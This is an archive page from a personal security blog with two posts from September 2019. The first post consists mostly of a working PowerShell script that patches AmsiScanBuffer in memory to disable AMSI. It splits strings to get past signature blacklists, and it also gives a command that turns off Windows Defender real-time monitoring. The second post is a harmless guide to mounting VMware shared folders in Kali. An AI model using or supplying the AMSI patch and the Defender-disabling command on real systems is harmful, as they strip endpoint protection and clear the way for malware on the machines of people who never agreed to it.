Kazam

Just another vulnerable WordPress site

Month: September 2019

Bypassing Windows Defender and AMSI 9/22/19 With Privileges

These steps assume you have access to powershell with admin rights. For the record, I’m not sure if this will work on a domain joined machine where conflicting policies may have been set. The AMSI script works by patching the AMSI DLL in memory, which means it’s not persistent and does not require privileges. The Defender command changes a registry value, which means it is persistend and it also requires privileges.

Disable AMSI

$win32 = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect
);
}
"@
Add-Type $win32
# String Concatenation to bypass blacklist
$ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScan"+"Buffer")
$b = 0
[Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
$buf = New-Object Byte[] 7
$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)

Credit to Avi Gimpel, the exact code in his blog post no longer works because it contains “AmsiScanBuffer” but with a little concatenation it still works great!

Disable Defender

PowerShell Set-MpPreference -DisableRealtimeMonitoring 1

Credit to Shawn Brink

Mounting a Shared Folder in Kali and VMware Workstation/Player 2019

I hate that I have to write this, but a lot of the solutions out there are really old and misleading. I’ve spent hours before just trying to get this to work. This method works with Kali 2019.3, and the day of this writing is 9/13/2019.

First install the relevant tools:

sudo apt install -y open_vm_tools open_vm_tools_desktop

Then make sure you share your folder through VM -> Settings -> Options tab and then set it to “Always Enabled”

Then run the following command:

sudo vmhgfs-fuse .host:/ /mnt/ -o allow_other -o uid=1000

Then run:

ls -la /mnt/

And you should see your shared folders popping up!

Alternatively, I just found out while writing this that there is a mount-shared-folders.sh bash script on the desktop of the VMware distribution. That probably works too.

Credit to con-f-use in one of the worst aging askubuntu questions ever.

© 2019 Kazam

Theme by Anders NorenUp ↑